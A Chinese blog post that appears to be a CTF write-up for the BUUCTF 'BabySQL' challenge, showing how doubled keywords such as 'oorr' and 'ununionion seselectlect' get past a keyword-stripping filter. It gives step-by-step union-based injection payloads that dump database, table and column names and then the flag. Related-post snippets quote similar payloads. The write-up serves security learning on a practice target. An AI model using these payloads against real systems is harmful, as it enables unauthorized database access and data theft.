记一次经典SQL双写绕过题目[极客大挑战 2019]BabySQL 1

已于 2023-11-07 22:23:02 修改
阅读量697 收藏 3
点赞数 9
分类专栏: CTF做题笔记 文章标签: sql 数据库 网络安全 web安全 mysql
于 2023-11-07 22:21:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73734159/article/details/134277587
版权

题目环境:
image.png

作者已经描述进行了严格的过滤
做好心理准备进行迎接

判断注入类型

admin
1’

字符型注入
image.png
万能密码注入

admin
1’ or ‘1’='1

报错
image.png

已经是字符型注入了,所以的话只有or这里存在了过滤
联想到buuctf里面还没有碰到双写绕过的题目
所以这里斗胆试一下使用双写绕过

1' oorr '1'='1
成功
image.png
使用堆叠注入爆数据库
1';show database();
报错
image.png
抛弃堆叠注入
尝试联合注入

联合注入末尾需要使用#号键进行注释#号后面的命令,避免报错

这里值得提一下schema和schemata和常见命令的理解

SCHEMA在MySQL中是数据库,SCHEMATA表用来提供有关数据库的信息。
union select就是联合注入,联合查询的意思
from来自
information_schema是MySQL自带的数据库
group_concat将值连接起来
where来自那个数据库或数据表等等

爆列数(关键命令采用双写进行绕过)
1' oorrder bbyy 4#
image.png
1' oorrder bbyy 3#
image.png

可知列数只有3列

查位(关键命令采用双写进行绕过)
1' ununionion seselectlect 1,2,3#
image.png
爆数据库(关键命令采用双写进行绕过)
1' ununionion seselectlect 1,database(),3#
image.png
采用第三列进行注入
爆所有数据库(关键命令采用双写进行绕过)
1' ununionion seselectlect 1,2,group_concat(schema_name) frfromom infoorrmation_schema.schemata#
image.png

根据常识ctf数据库里面存在flag的可能更大,故选择ctf数据库

爆ctf数据库里面的数据表
1' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='ctf'#

因为ctf在schema里面所有这里就是table_schema,schema里面的数据库ctf里面的数据表

得到Flag数据表
image.png
爆Flag数据表里面的字段
1' ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='Flag'#
得到flag字段
image.png
爆flag字段内容
1' ununionion seselectlect 1,2,group_concat(flag) frfromom ctf.Flag#

ctf.Flag意思就是ctf数据库里面的Flag数据表

image.png
得到flag:
flag{fbd18420-cab7-4d6e-8fb9-f8ea6febda61}

白猫a~
关注
专栏目录
CTF学习笔——[极客挑战 2019]BabySQL
Obs_cure的博客
02-09 1444
一、[极客挑战 2019]BabySQL 1.题目 2.解题步骤 一看就知道是之前一个系列的题,可惜并不耽误我不会做… 在尝试的时候报错是看不懂的,这里简单述一下心路历程。SQL注入的题目自然是1' or 1=1 # 结果很奇怪 这里在看过WP才知道是把or过滤掉了才有这样的回显。很明显我注入的东西和回显出来的东西不一样。那么是什么过滤呢,从这样的回显来看,是把or替换成了空白。师傅们的做法是双写。就是改成oorr。匹配的时候会把中间的替换成空 然后外面的再组成or。双写绕过学会了) 接下来就是常
web-[极客挑战 2019]BabySQL
wojiushilsy的博客
05-13 316
题目要点题目内容解题1.查询数据库2.查询表名3.查询字段名4.查询数据 题目要点 双写绕过:waf将关键字替换为空。 题目内容 解题 1.查询数据库 /check.php?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(schema_name)%20frfromom%20infoorrmation_schema.schemata%20%23 结果 Hello 2! Your.
SQL注入漏洞绕过篇)
errorr0
06-24 4885
SQL注入的绕过手法
数据库双写
fan1865221的博客
07-28 2612
更换数据库数据库双写过渡功能
mysql 特性之一 double write (双写)
一名数据库爱好者的专栏
02-16 2856
os: centos 7.4 db: mysql 5.7.28 版本 # cat /etc/centos-release CentOS Linux release 7.4.1708 (Core) # # mysql -u root -p Enter password: Welcome to the MySQL monitor. Commands end with ; or \g. Your...
双写数据库和缓存方案
记录点滴
12-10 294
参考链接: 1、 https://cloud.tencent.com/developer/article/1165508 2、 https://zq99299.github.io/note-book/cache-pdp/037.html#%E8%AE%B2%E5%B8%88%E6%97%81%E7%99%BD
buu web:[极客挑战 2019]BabySQLsql注入双写绕过
m0_55378150的博客
04-18 3044
打开靶场,熟悉的界面 依旧是先上万能密码 1' or 1=1# 1' or 1=1# 好家伙,直接就给你报错了,可以看到,or被它过滤掉了,所以我们尝试一下双写绕过 1' oorr 1=1# 1' oorr 1=1# 成功登录! 可以拿admin回去登录界面继续注入了,先爆字段 admin' oorrder by 2#(密码随便输) 提示在字段数附近有报错,猜测可能是by也被过滤了,依旧是双写绕过 admin' oorrder bbyy 2# 可以的,通过...
Sql注入绕过
Matheus的博客
08-01 2197
SQL注入绕过双写绕过 1.过滤判断 xxx.com?id=1 访问?id=1and1=1 页面报错 1=1,发现and被过滤,这时候尝试使用双写的方式绕过,如aanndd 1=1,当and被过滤后,aanndd变成了and,所以这时传输数据库的语句是 and 1=1 ,如果当访问 order by 错误信息为”der by”这发现过滤了or,这双写or,后面注入和union注入的一致。 2.练习sqli-labs Less-25 Trick with OR & AND (过滤了or和and)
[极客挑战 2019]BabySQL 1
09-03
BabySQL 1 是一道出现在极客挑战 2019题目,是一个 SQL 注入的题目。在这道题中,你需要通过注入来绕过对输入参数的限制,从而获取到所需的数据。 请注意,这里只是简单介绍了题目的基本情况,具体的题目内容...
[极客挑战 2019]babysql
03-16
"极客挑战 2019" 的 "babysql" 是一道 SQL 注入漏洞题目题目要求通过提交带有恶意代码的 SQL 查询,绕过网站的验证机制并获取敏感信息。解决这道题目的关键在于对 SQL 注入的理解和利用。
Web_SQL注入(1)
Lemon's blog
07-15 617
[GYCTF2020]Blacklist ——涉及新知识HANDLER ... OPEN等、堆叠注入 这道题和之前做那道强网杯的题目一样,但之前的方法比如读取flag时改表名或者是用SQL的预处理进行绕过都不可行了,因为过滤了set prepare alter rename 所以这里就涉及到了一种新的方法 HANDLER ... OPEN语句打开一个表,使其可以使用后续HANDLER ... READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER ... CLOSE或会话终止之前不会关
sql注入
qq_44040833的博客
02-03 3144
SQL注入 sql注入就是web应用程序对用户入的数据合法性没有进行判断,前端传输参数由攻击者构造的sql语句被带入到了数据库,依靠构造sql语句可以进行查询,删除等操作,如果数据库权限很高,还可以对操作系统进行操作。 SQL注入的各种方式 注入点分类 数字注入 字符注入 搜索注入 传参方式分类 get post cookie http头部 返回信息类型分类 布尔盲注 ...
Mysql双写_DoubleWrite
翔之天空的专栏
01-21 3602
目的:防止页损坏, 原理:在内存中开辟了 doublewrite buffer 内存空间(2M),将脏页复制到doublewrite buffer 内存空间后, 先把doublewrite buffer的页数据写入到共享表空间ibdata1磁盘上,复制了页的副本完成之后, 再将 doublewrite buffer的页数据写入到各个表空间文件中。   数据页默认16k,一次写入512字节,防...
ctf /**/与双写 绕过sql过滤
qq_43943098的博客
07-11 3745
注意: 本博客可能转载了多处文章内容,所有转载内容均会标明出处,谢谢!! 0.在文章开始之前的话 本人也这是刚刚接触数据库这一块不过一周的时间,在此之前都是普通的码奴,所以对sql的命令或者语句有着错误的理解,请各位dalao海涵并在评论里指出。 1.浅谈我对sqlsql注入的理解 所谓sql,其原名是结构话查询语句,对于这个结构化我首先想到的是Linux里大部分的命令都带有的 -型的参数,再则...
MYSQL INNODB 三大特性之双写
热门推荐
bohu83的博客
07-30 1万+
一 序       本文属于《MYSQL运维内参》第九章读书笔,因为INNODB的三大特性:插入缓存,两次写,自适应hash,还是觉得作者先介绍插入缓存会更有助于理解。       为啥会有两次写?必要了解partial page write 问题 :         InnoDB 的Page Size一般是16KB,其数据校验也是针对这16KB来计算的,将数据写入到磁盘是以Page为单位进...
sql联合注入步骤例题LoveSQLBabySQL双写绕过
qq_58970968的博客
04-04 1299
拿到题目有登录界面 1.想到万能密码: 1' or 1=1# 发现登录成功;但是拿到这个页面毫无卵用;浪费时间,由于是一道考sql注入的题,想到后台肯定有表字段这些,flag就藏在里面,爆出他们就行了; 2:查有多少字段: 1'order by 4# 这时报错,说明有三个字段, 3.有三个字段之后在看回显,也就是说看显示的是哪几个字段;: 1' union select 1,2,3# 回显了2和3;回显字段为第二个和第三个; 4.然后爆数据库名: 1' union select .
sqlalchemy JSON 字段写入时中文序列化问题
llc的博客
09-12 301
_table_args__ = ({"comment": "表名称"})...extra = Column(JSON, comment="其他属性")...
text2sql(NL2Sql)综述《The Dawn of Natural Language to SQL: Are We Fully Ready?》
最新发布
beingstrong的博客
09-15 594
text2sql(NL2Sql)综述《The Dawn of Natural Language to SQL: Are We Fully Ready?》详细笔
SQL(结构性查询语句)
2301_78693337的博客
09-11 444
以上就是今天要讲的内容,本文介绍了基础的SQL语法使用,而sql还提供了大量能使我们快速便捷地处理数据的函数和方法等着我们探索。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白猫a~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值